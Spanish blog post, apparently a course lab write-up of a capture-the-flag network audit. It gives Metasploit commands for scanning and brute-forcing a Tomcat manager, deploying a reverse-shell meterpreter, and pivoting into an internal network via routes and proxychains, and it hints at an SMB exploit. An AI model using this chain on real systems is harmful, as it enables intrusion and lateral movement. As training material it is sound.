Actividad C1 – Resolución del reto final Actividad C1 – Resolución del reto final
{:es} Este sería el esquema de la red que debemos auditar y encontrar las banderas en el proceso: Primero de todo hemos de saber... Actividad C1 – Resolución del reto final

{:es}

Este sería el esquema de la red que debemos auditar y encontrar las banderas en el proceso:

Primero de todo hemos de saber que ip queremos atacar, vamos a hacer un escaneo de red con nmap:

nmap -sP 10.2.2.0/24

Esto nos devuelve el resultado siguiente:

Como nuestro equipo tiene la ip 10.2.2.6, la máquina Linux ha obtenido por DHCP la 10.2.2.5, este será nuestra objetivo. Veamos los servicios que tiene activos

Podriamos centrarnos en el SSH pero, lo recomendado es no realizar uso de exploit, en la medida de los posible. En un entorno real es muy dificil encontrar algun sistema sin parchear critico y sobre todo, el uso de exploit hace que las maquinas se cuelguen, con la consiguiente perdido de servicio que puede probocar. Dicho esto, nos centramos en el TOMCAT, vamos a ver que teine ese servicio web. Podemos usar para ello metasploit, usamos los modulos que trae que no todo ha de ser lanzar exploits ::xD.

use auxiliary/scanner/http/dir_scanner
set RHOST 10.2.2.5
set RPORT 8080
run

Desde el manager se puede gestionar el despliegue de aplicaciones mediante war, pero para ello debemos saber usuario y password, se suele probar en estos cosos con usuarios y contraseñas por defecto, pero… podemos usar de nuevo un módulo auxiliar de metasploit para hacer fuerza bruta al servicio:

use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS 10.2.2.5
set RPORT 8080
set STOP_ON_SUCCESS true
run

Ok, pues ya tenemos usuario y password para subir una nueva app al Tomcat

usuario: tomcat / password: manager

Bien podemos usar de nuevo metasploit para cargar un shell inversa que nos de un meterpreter contra la primera máquina, veamos como:

use exploit/multi/http/tomcat_mgr_upload
set RHOST 10.2.2.5
set RPORT 8080
set HttpUser tomcat
set HttpPassword manager
exploit

Estamos dentro de la maquina linux como usuario: tomcat, mirando un poco por la máquina obtenemos el primer flag en el fichero que contiene los usuarios en Linux

Ahora podemos usar esta máquina para pivotar hacia la red interna 192.168.50.x a la que no tenemos acceso desde el exterior. Para ellos utilizamos también metasploit, desde la consola de meterpreter ponemos la sesion en background:

Ahora tenemos que añadir la ruta para que todo el trafico que vaya dirigido a la red 192.168.50.x lo meta por esa sesion.

route add 192.168.50.0/24 1

Ahora podemos también utilizar proxychain para lanzar por ejemplo un nmap desde la maquina Kali sin estar acotados a metasploit. Para ellos usamos otro modulo:

Ejecutamos el modulo con run y modificamos el fichero de configuración de proxychain en Kali:

vi /etc/proxychains.conf

Cambiamos esta linea:
socks4 127.0.0.1 1080

Ahora podemos lanzar un nmap desde Kali hasta la red interna, por ejemplo buscando puertos abiertos en la maquina Windows:

root@kali# proxychains nmap -sT 192.168.50.4

Vemos que la máquina Windows tiene SMB… ms08_067_netapi?

{:}{:en}This would be the scheme of the network that we should audit and find the flags in the process:

{:}

gpinero

No hay comentarios

Se el primero en dejar un comentario.

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

CAPTCHA ImageChange Image